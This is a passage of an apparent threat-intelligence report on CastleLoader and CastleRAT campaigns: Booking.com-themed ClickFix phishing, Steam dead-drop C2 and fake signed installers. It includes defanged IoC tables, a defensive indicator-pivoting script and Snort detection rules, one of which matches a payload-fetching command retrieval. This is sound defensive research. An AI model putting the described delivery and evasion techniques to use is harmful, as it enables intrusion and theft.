        <p>The domains <em>site-riko[.]com</em>, <em>site-sero[.]com</em>, <em>site-silo[.]com</em>, <em>site-tiko[.]com</em>, and <em>site-filo[.]com</em> are all referenced within the DOM.</p>
        <p>Notably, within the “debug logs” in the DOM of the website, Insikt Group found a range of proxy servers with varying high ports. The IP addresses are listed in <strong>Table 1</strong>.</p>
        <table>
          <thead>
            <tr>
              <th>IP Address</th>
              <th>Ports</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>109[.]104[.]153[.]100</td>
              <td>11599, 12305, 13267, 13275</td>
            </tr>
            <tr>
              <td>109[.]104[.]153[.]193</td>
              <td>10324, 10616, 14195, 14196</td>
            </tr>
            <tr>
              <td>109[.]104[.]153[.]29</td>
              <td>13413, 14900</td>
            </tr>
            <tr>
              <td>109[.]104[.]154[.]67</td>
              <td>11264, 11860, 14100, 14122</td>
            </tr>
          </tbody>
        </table>
        <p><em><strong>Table 1</strong>: Proxy IP addresses found in DOM of “Booking-Mailer V2.2” tool (Source: Recorded Future)</em></p>
        <p>Insikt Group identified additional instances of the Phishing Email Management Tooling, all hosted on IP addresses announced by the same set of Autonomous Systems (ASes). The identified IP addresses are listed in <strong>Table 2</strong>. The domains hosted on these IP addresses are listed in <strong>Appendix H</strong>.</p>
        <table>
          <thead>
            <tr>
              <th>IP Address</th>
              <th>ASN</th>
              <th>Notes</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>85[.]208[.]84[.]65</td>
              <td>STIMUL-AS, RU (AS211659)</td>
              <td>
                <ul>
                  <li>Certificate subject common name: <em>guesitastayhotel[.]com</em></li>
                  <li>CastleRAT and Matanbuchus C2 servers identified within the same /24 range (<em>85[.]208[.]84[.]115</em> and <em>85[.]208[.]84[.]242</em>, respectively)</li>
                </ul>
              </td>
            </tr>
            <tr>
              <td>80[.]64[.]18[.]245</td>
              <td>STIMUL-AS, RU (AS211659)</td>
              <td>
                <ul>
                  <li>Hosts hotel-themed domains</li>
                </ul>
              </td>
            </tr>
            <tr>
              <td>185[.]39[.]19[.]94</td>
              <td>OPTIMA-AS, RU (AS216341)</td>
              <td>
                <ul>
                  <li>Certificate subject common name: <em>guesitastayhotel[.]com</em></li>
                </ul>
              </td>
            </tr>
            <tr>
              <td>88[.]214[.]50[.]83</td>
              <td>OPTIMA-AS, RU (AS216341)</td>
              <td>
                <ul>
                  <li>Suspected testing server due to the number of domains including the keywords “test” and “demo”</li>
                </ul>
              </td>
            </tr>
          </tbody>
        </table>
        <p><em><strong>Table 2</strong>: Additional infrastructure instances of the Phishing Email Management Tooling (Source: Recorded Future)</em></p>
        <h5>ASN Cluster Possibly Linked to Bearhost</h5>
        <p>Insikt Group observed significant infrastructure activity associated with AS211659 (STIMUL-AS) and AS216341 (OPTIMA-AS) throughout this research. Both ASes were established on March 11, 2025, and have demonstrated consistent malicious activity since their inception. According to researchers at DeepCode, these providers <a href="https://decodecybercrime.com/bearhost-bulletproof-hosting-network-same-playbook-new-fronts/">maintain</a> strong links to the BEARHOST bulletproof hosting network, a known enabler of malicious cyber operations. BEARHOST and associated providers have reportedly serviced ransomware operations, including LockBit, Conti, and MedusaLocker, as well as sanctioned entities such as Garantex, Lazarus Group, Zservers, and Nobitex. That same research further identified malicious activity and customer bases linked to both AS211659 and AS216341, consistent with Insikt Group’s own observations of Lumma, Rhadamanthys, and Matanbuchus within these autonomous systems. This overlap in observed threats reinforces the assessment that both autonomous systems are part of a broader BEARHOST-aligned infrastructure ecosystem supporting financially motivated cyber operations.</p>
        <h5>Infrastructure Similarities with TAG-157 (RefBroker)</h5>
        <p>Insikt Group has previously reported on threat actors impersonating Booking.com, including TAG-157, also known as RefBroker. Notably, domains associated with TAG-157 have been observed hosted on IP address <em>77[.]83[.]207[.]56</em>, adjacent to <em>77[.]83[.]207[.]55</em>, with the latter being part of TAG-161’s infrastructure. More broadly, both TAG-157 and TAG-161 appear to favor the same set of ASNs discussed in the section <strong>ASN Cluster Possibly Linked to Bearhost</strong>. At present, however, the exact relationship between TAG-157 and TAG-161 remains unclear.</p>
        <h4>Cluster 3: Booking.com Impersonation Activity</h4>
        <p>Cluster 3 has been active since at least March 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com, ClickFix techniques, and uses Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader. Although the techniques appear similar to those described in Cluster 2, Insikt Group has not identified any technical overlaps between Clusters 2 and 3 at this time.</p>
        <h5>Infrastructure Analysis</h5>
        <p>Insikt Group noted a CastleRAT <a href="https://tria.ge/250818-vhng4awks9/behavioral2">sample</a> that leveraged a Booking.com phishing domain, <em>update-info4468765[.]com</em> (see <strong>Figure 20</strong>). The phishing domain tricks users into running a malicious PowerShell command (via ClickFix techniques) that downloads a second-stage script from <em>boiksal[.]com/upd</em>. This script retrieves and executes a .NET loader that repeatedly spawns new PowerShell processes to add Windows Defender exclusions for the eventual payload (<code>update.exe</code>), using a User Account Control (UAC) prompt flooding loop to bypass analysis sandboxes and security controls. Once exclusions are applied, the loader decrypts and launches the CastleLoader payload, which then reaches out to its C2 domain, <em>programsbookss[.]com</em>, resolved through a Steam Community profile. The use of Steam Community profiles allows attackers to update infrastructure dynamically without redeploying malware (see <strong>Figure 21</strong>). CastleRAT samples that use Steam for dead drops may sometimes contain a hard-coded backup C2 in the event the dead drop C2 retrieval fails. A list of all observed Steam Community profiles and the various C2 domains observed on each is found in <strong>Appendix F</strong>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_11fc64af5fa19c4f74249b006eab3899fe29a0281.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1493" />
        </p>
        <p><em><strong>Figure 20</strong>: GrayBravo’s CastleRAT using Steam Community for dead drop resolving (Source: Steam)</em></p>
        <p>At the time of analysis, <em>update-info4468765[.]com</em> and <em>boiksal[.]com</em> were both hosted on <em>178[.]17[.]57[.]103</em>, while the Steam-resolved C2 domain, <em>programsbookss[.]com</em>, was hosted on an adjacent IP, <em>178[.]17[.]57[.]102</em>. This close placement within the same /24 subnet suggests that the operators likely acquired these IP addresses around the same time. It also suggests that they were assigned sequentially by the hosting provider, Global Connectivity Solutions (AS215540). A similar pattern was later observed across the <em>192[.]109[.]138[.]0/24</em> range, where Booking.com-themed phishing domains were hosted on <em>192[.]109[.]138[.]103</em> and the Steam-resolved C2 domains, <em>programsbookss[.]com</em> and <em>justnewdmain[.]com</em>, were hosted on <em>192[.]109[.]138[.]102</em>.</p>
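        <p>The adjacency pivot described above (phishing domains and the Steam-resolved C2 domain on neighbouring addresses of the same /24, and one C2 domain reappearing across two ranges) can be automated over an indicator list. The following is an added illustration, not Insikt Group tooling; the indicator list is taken from this section, and the unnamed Booking.com-themed phishing domains on <em>192[.]109[.]138[.]103</em> are represented by a labelled placeholder.</p>

```python
"""Group domain/IP indicators by /24 and surface numerically adjacent hosts.

Added example for illustration; not Insikt Group tooling. It reproduces the pivot
described for Cluster 3: phishing domains and the Steam-resolved C2 domain sat on
neighbouring addresses of the same /24, and the same C2 domain later appeared in
a second range with the same layout. The indicator list is taken from the text;
the unnamed Booking.com-themed phishing domains are a labelled placeholder.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict

INDICATORS: list[tuple[str, str]] = [
    ("update-info4468765[.]com", "178[.]17[.]57[.]103"),
    ("boiksal[.]com", "178[.]17[.]57[.]103"),
    ("programsbookss[.]com", "178[.]17[.]57[.]102"),
    ("<booking-themed phishing domains, unnamed>", "192[.]109[.]138[.]103"),  # placeholder
    ("programsbookss[.]com", "192[.]109[.]138[.]102"),
    ("justnewdmain[.]com", "192[.]109[.]138[.]102"),
]


def refang(indicator: str) -> str:
    """Turn a defanged domain or address into a plain one."""
    return indicator.replace("[.]", ".")


def group_by_prefix(indicators, prefix_len: int = 24) -> dict[str, dict[str, set[str]]]:
    """network -> ip -> set of domains hosted there."""
    groups: dict[str, dict[str, set[str]]] = defaultdict(lambda: defaultdict(set))
    for domain, ip_text in indicators:
        ip = ipaddress.ip_address(refang(ip_text))
        net = ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)
        groups[str(net)][str(ip)].add(refang(domain))
    return {net: dict(hosts) for net, hosts in groups.items()}


def adjacent_pairs(indicators, prefix_len: int = 24) -> list[tuple[str, str, str]]:
    """(network, lower_ip, higher_ip) for addresses in one prefix that differ by exactly 1."""
    pairs: list[tuple[str, str, str]] = []
    for net, hosts in group_by_prefix(indicators, prefix_len).items():
        ips = sorted(ipaddress.ip_address(h) for h in hosts)
        for lo, hi in zip(ips, ips[1:]):
            if int(hi) - int(lo) == 1:
                pairs.append((net, str(lo), str(hi)))
    return pairs


def shared_domains(indicators, prefix_len: int = 24) -> dict[str, set[str]]:
    """domain -> the prefixes it was hosted in, for domains seen in more than one prefix.

    A domain that moves between ranges (here programsbookss.com) ties the ranges
    together and is the pivot for extending the cluster.
    """
    seen: dict[str, set[str]] = defaultdict(set)
    for net, hosts in group_by_prefix(indicators, prefix_len).items():
        for domains in hosts.values():
            for domain in domains:
                seen[domain].add(net)
    return {d: nets for d, nets in seen.items() if len(nets) > 1}


if __name__ == "__main__":
    for net, lo, hi in adjacent_pairs(INDICATORS):
        print(f"{net}: {lo} <-> {hi}")
    for domain, nets in shared_domains(INDICATORS).items():
        print(f"{domain} seen in {sorted(nets)}")
```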
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1b8336b05390165b9d107f8417922fed7d97dacc5.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1015" />
        </p>
        <p><em><strong>Figure 21</strong>: Booking.com-themed ClickFix linked to Cluster 3 (Source: Recorded Future)</em></p>
        <p>When scanned, the Booking.com-themed domains typically return either a Cloudflare-themed Turnstile page or a “turnstile token missing” error message (<a href="https://pro.urlscan.io/result/0198f318-4860-7256-9c58-74307bfe89d0">1</a>, <a href="https://pro.urlscan.io/result/0198e28c-2350-7217-ad05-ebd6694c5fc2">2</a>). Further pivoting from the domain <em>boiksal[.]com</em> uncovered a broader cluster of activity encompassing multiple additional domains and IP addresses, most of which appear to be used to impersonate Booking.com. The domains and associated IP addresses are detailed in <strong>Appendix G</strong>. Notably, while the domains commonly use Cloudflare name servers, many of them ultimately resolve to threat actor–controlled IP addresses.</p>
        <h4>Cluster 4: Malvertising and Fake Software</h4>
        <p>Cluster 4 has been active since at least April 2025 and remains operational at the time of analysis. This cluster employs malvertising and fake software installers, impersonating legitimate tools such as Zabbix and RVTools, to distribute CastleLoader and NetSupport RAT.</p>
        <p>Based on Insikt Group observations, the cluster has used CastleLoader C2 infrastructure hosted on domains including <em>wereatwar[.]com</em>. It has also deployed NetSupport RAT samples that communicate with C2 servers at IP addresses such as <em>37[.]230[.]62[.]235</em> and <em>84[.]200[.]81[.]32</em>. Notably, the domain <em>jshanoi[.]com</em> resolved to these NetSupport-associated IP addresses during the period of activity.</p>
        <p>The CastleLoader payloads are distributed through fake GitHub repositories and delivered as digitally signed MSI installers, often bearing Extended Validation (EV) certificates, similar to those <a href="https://x.com/g0njxa/status/1980943290896630209/photo/3">observed</a> in previous Bumblebee campaigns. These signed builds have been attributed to organizations including LLC KHD GROUP (issued by GlobalSign) and INTYNA EXIM PRIVATE LIMITED (issued by SSL.com), among others. Notably, “Sparja”, an Exploit Forum user discussed below and potentially linked to CastleLoader, was active in discussions regarding EV certificates earlier this year.</p>
        <h3>Possible Connection to Exploit Forum User Sparja</h3>
        <p>Analysis of <a href="https://tria.ge/250520-yvkthsbr2s">historical</a> CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor named “Sparja”. A panel hosted on <em>94[.]159[.]113[.]123</em> and exposed on port 5050 diverged from established CastleLoader panel characteristics. While known CastleLoader administrative interfaces typically display the HTML title “Castle,” this instance returned the title “Sparja.” Review of the panel’s DOM revealed that it referenced a CSS file with a filename identical to one observed in verified CastleLoader panels. While the overlap does not constitute a conclusive stylistic correlation, it may suggest code reuse or reliance on a shared panel template between CastleLoader and the “Sparja” interface. Insikt Group identified one other Sparja panel with the same HTML title on the IP address <em>94[.]159[.]113[.]32</em> (see <strong>Figure 22</strong>).</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1694a57896b2a72600c74c531634a7f93ce34875f.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="272" />
        </p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_158f591d974d66fb741ee6789a74a8c861cd0c09f.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="272" />
        </p>
        <p><em><strong>Figure 22:</strong></em> <em>Sparja panel (top) and CastleLoader panel (bottom) (Source: Recorded Future)</em></p>
        <p>Activity associated with the alias “Sparja” on the underground Exploit Forum provides additional context for possible connections. Based on information obtained via proprietary means, Insikt Group assesses that Sparja is also active on the top-tier Russian-language forum XSS. Insikt Group bases this assessment on the user’s XSS activity, in which the user viewed similar topics related to malware loaders, EV certificates, and bypass software.</p>
        <p>On December 22, 2024, Sparja authored a thread on Exploit Forum looking to buy or rent a dropper (see <strong>Figure 23</strong>). In a documented dispute spanning January to February 2025, Sparja engaged a user known as “ppro” to develop a “private solution, a dropper or loader for an executable file.” The dispute concluded with ppro’s ban from the forum, following a history of earlier account suspensions and reinstatements. Given the timeline of events, Insikt Group assesses it is unlikely that ppro was involved in CastleLoader’s development; however, Sparja’s expressed interest in acquiring a custom loader prior to CastleLoader’s appearance supports the assessment that Sparja was actively pursuing dropper or loader functionality consistent with CastleLoader’s purpose.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c30437beb16bf10e993ab55c126b207e27dcf839.png?width=750&amp;format=png&amp;optimize=medium" width="767" height="529" />
        </p>
        <p><em><strong>Figure 23:</strong></em> <em>Sparja in search of a dropper or loader on Exploit Forum (Source: Recorded Future)</em></p>
        <p>Forum discussions in October 2025 indicate continued interest in Sparja’s apparent tooling (see <strong>Figure 24</strong>). A subsequent post sought contact with “the coder who wrote the Sparja dropper,” implying that a distinct dropper associated with Sparja had circulated within the underground market. This activity’s timeline aligns with CastleLoader operations and suggests that Sparja’s development or procurement of loader-type malware was known among peers during the same operational period.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_19420a3499ba40af372c0899cb96c5e2a7642dac2.png?width=750&amp;format=png&amp;optimize=medium" width="983" height="367" />
        </p>
        <p><em><strong>Figure 24:</strong></em> <em>Exploit Forum user “tomri99le” looking for the coder who worked with Sparja (Source: Recorded Future)</em></p>
        <p>A <a href="https://tria.ge/250520-yvkthsbr2s/behavioral1">related</a> CastleLoader sample, distributed as an MSI installer, was <a href="https://bazaar.abuse.ch/sample/8f3fc820def7b492876b38d021c904aafc60c379e8ad58cac81eee05bf41ee77/">identified</a> in abuse.ch MalwareBazaar data as originating from the GitHub account <em>github[.]com/legend123451111</em>. The same account appears in a Cisco Talos <a href="https://blog.talosintelligence.com/maas-operation-using-emmenhtal-and-amadey-linked-to-threats-against-ukrainian-entities/">report</a> describing a malware-as-a-service (MaaS) ecosystem that leverages GitHub for payload distribution, including malware families such as Amadey and Emmenhtal. Talos noted consistent naming conventions, repository structures, and file types across multiple associated GitHub accounts, with the earliest activity dated to January 2025. The report concluded that the operators of these accounts likely facilitated multi-tenant malware distribution rather than single-threat-actor campaigns.</p>
        <p>The available evidence does not confirm that Sparja directly participated in the MaaS network described by Talos; however, the CastleLoader sample that originated from <em>github[.]com/legend1234561111</em>, which contained the MSI installer, is linked to the Sparja-named CastleLoader panel, indicating a potential overlap between the GitHub-based distribution channel and infrastructure associated with Sparja. This connection suggests that Sparja may have either used an existing MaaS framework to distribute CastleLoader payloads or operated within the same delivery ecosystem.</p>
        <p>On October 27, 2025, Sparja posted a comment on Exploit Forum within a thread advertising eDragon_x’s dropper service, stating that they had been using the service for several months and considered the dropper reliable. This post is notable because it reinforces Sparja’s continued interest in droppers and loaders, a recurring theme in their activity. The post also situates Sparja in proximity to eDragon_x, a threat actor operating within overlapping underground circles that include “tramp”, a known threat actor <a href="https://www.cyberdaily.au/security/11791-black-basta-ransomware-leader-slips-away-from-courtroom">reportedly</a> identified as Oleg Nefedov. Tramp is associated with a spamming network responsible for <a href="https://x.com/PRODAFT/status/1892636346885235092">distributing</a> Qbot (aka Qakbot) and is identified as the founder of the Black Basta ransomware group. Tramp was also an affiliate of several ransomware operations, such as REvil and Conti, and maintained close ties with Rhysida and Cactus.</p>
        <p>While there is no direct evidence of collaboration between Sparja and tramp, the shared participation across related forums and service providers like eDragon_x suggests that Sparja operates within a network of threat actors closely associated with major ransomware distribution and loader development ecosystems.</p>
        <h3>Victimology</h3>
        <p>Insikt Group identified numerous suspected victim IP addresses communicating with the Tier 1 C2 infrastructure associated with CastleRAT. While the majority of these IP addresses appear to be geolocated in the United States, only a limited number of actual victims could be positively identified. Most victims remain unidentified and cannot be confirmed; however, Insikt Group assesses it is likely that at least some of them are private individuals who became infected. It is important to note that, for the entities Insikt Group did identify, the infection may have occurred on individual machines connected to the victim organization’s network or Wi-Fi rather than on the organization’s own systems. For instance, within the university context, it is likely that some victims are individual machines, such as those used by students, connected to the university’s network.</p>
        <h2>Mitigations</h2>
        <ul>
          <li>Leverage the IoCs in <strong>Appendix H</strong> to investigate potential past or ongoing infections, both successful and attempted, and use the Recorded Future Intelligence Cloud to monitor for future IoCs associated with GrayBravo (formerly tracked as TAG-150), TAG-160, TAG-161, and other threat actors.</li>
          <li>Monitor for validated infrastructure associated with the malware families discussed in this report, including CastleLoader, CastleRAT, Matanbuchus, and numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.</li>
          <li>Leverage Sigma, YARA, and Snort rules provided in <strong>Appendices I</strong>, <strong>J</strong>, <strong>K</strong>, <strong>L</strong>, <strong>M</strong>, <strong>N</strong>, and <strong>O</strong> in your SIEM or endpoint detection and response (EDR) tools to detect the presence or execution of CastleLoader, CastleRAT, and Matanbuchus. Additionally, use other detection rules available in the Recorded Future Intelligence Cloud.</li>
          <li>Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure. This can be achieved by employing specific queries and filtering the results based on your assets.</li>
          <li>Use the Recorded Future Intelligence Cloud to monitor GrayBravo, TAG-160, TAG-161, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.</li>
          <li>Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to you. For example, if you want to stay informed about activities related to specific personas such as Sparja, you can receive regular AI-generated updates on this threat actor’s activity on Exploit Forum.</li>
        </ul>
        <h2>Outlook</h2>
        <p>As anticipated in earlier assessments, GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware. This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective. Given GrayBravo’s established history of developing and deploying custom malware families, it is highly likely the group will continue to release new tools and capabilities in the near term, further strengthening its position within the MaaS market.</p>
        <p>Among observed activity clusters, TAG-160 stands out for its highly targeted campaigns against the logistics sector. The cluster demonstrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. This indicates an increasing sophistication among niche, sector-specific threat actors who maintain a low profile through minimal footprints and precise targeting.</p>
        <p>Insikt Group will continue to closely monitor GrayBravo along with related threat actors, such as TAG-160 and TAG-161, to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.</p>
        <h2>Appendix A: CastleLoader C2 Servers</h2>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix B: Additional Infrastructure Likely Linked to CastleLoader</h2>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix C: Logistics-Themed Infrastructure Used by TAG-160</h2>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix D: Booking.com-Themed Domains Linked to TAG-161</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>roomiverifaccess[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-02</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>roomverifaccess[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-03</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>roomverifiaccess[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-02</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>servicehotelonline[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-03</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>verifihubguest[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-28</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>verifyhubguest[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-28</div>
            <div>2025-10-22</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix E: Additional Infrastructure Linked to “Redirect and Email Manager” Tool</h2>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix F: Steam Community Profiles and Their Corresponding C2 Domains, Alongside the IP Addresses That Hosted the C2 Domains</h2>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix G: Booking.com-Themed Infrastructure Linked to Cluster 3</h2>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix H: Indicators of Compromise (IoCs)</h2>
        <h2>Appendix I: Snort Rules for CastleLoader</h2>
        <div>
          <div>
            <div>
              <pre><code>alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Checkin"; flow:established,to_server; content:"GET"; http_method; urilen:82,norm; content:"|2F|service|2F|settings|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460302; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460303; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleLoader Malware Stager Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; depth:18; fast_pattern; content:".bin"; http_uri; content:"GoogeBot"; http_user_agent; depth:8; isdataat:0,relative; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460304; rev:1; metadata:author MGUT, created_at 2025-08-12, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert tcp $EXTERNAL_NET 79 -&gt; $HOME_NET any (msg:"CastleLoader Malware Inbound Command Retrieval via Finger Service"; flow:established,to_client; content:"Login|3A 20|"; depth:7; content:"Plan|3A|"; distance:0; content:"%random%"; fast_pattern; distance:0; content:"|20|--tlsv1.2|20|-L|20|-o|20|"; distance:0; content:"|0D 0A|mkdir|20|"; distance:0; content:"|0D 0A|tar|20|"; distance:0; reference:url,https://tria.ge/251110-zcgvkstpck; classtype:trojan-activity; sid:52460334; rev:2; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix J: Snort Rules for CastleRAT</h2>
        <div>
          <div>
            <div>
              <pre><code>alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|02 56 77 8E A5 83 D7 05 02 C2 1E D9 70 5A 47 E5 11 92 B5 5A|"; fast_pattern; depth:20; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460307; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|BF CF 04 82 45 DF 4F 09 55 5E 0B 15 9F E2 91 A0 68 51 1E 87|"; fast_pattern; depth:20; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460308; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|6B 13 5C 08 BD 49 59 75 79 62 4E EA 2F DE 57 F4 6E 08 8B 6B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250219-nsbsqazpep; classtype:trojan-activity; sid:52460309; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|56 EA 59 DB 6B DD 36 81 42 01 C6 84 DF 5A 6B E8 38 14 8D 07|"; fast_pattern; depth:20; reference:url,https://tria.ge/250505-wmbvjabk3t; classtype:trojan-activity; sid:52460310; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|A8 CF 1E 1D BA 27 49 FB 63 38 F4 52 A7 9C 39 CF 4A 85 E5 5B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460311; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|0F 0D F7 66 4C B2 D5 12 BA 55 CC BB 2E 1B F4 AD C0 E0 7C A2|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-rt355svtfs; classtype:trojan-activity; sid:52460312; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|74 6F D9 7F B5 48 F6 91 26 E0 16 5A 81 29 4F 35 21 6C 61 82|"; fast_pattern; depth:20; reference:url,https://tria.ge/250813-a7c3fadl7z; classtype:trojan-activity; sid:52460313; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|61 57 7C E8 EE BE 56 71 B3 98 F4 A6 87 E3 0C 39 50 0C 29 41|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460314; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|4D 58 29 58 84 15 1B 1D 2A D9 80 90 5C 36 1C A0 43 05 80 48|"; fast_pattern; depth:20; reference:url,https://tria.ge/250701-v6911aykv9; classtype:trojan-activity; sid:52460335; rev:1; metadata:author MGUT, created_at 2025-10-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

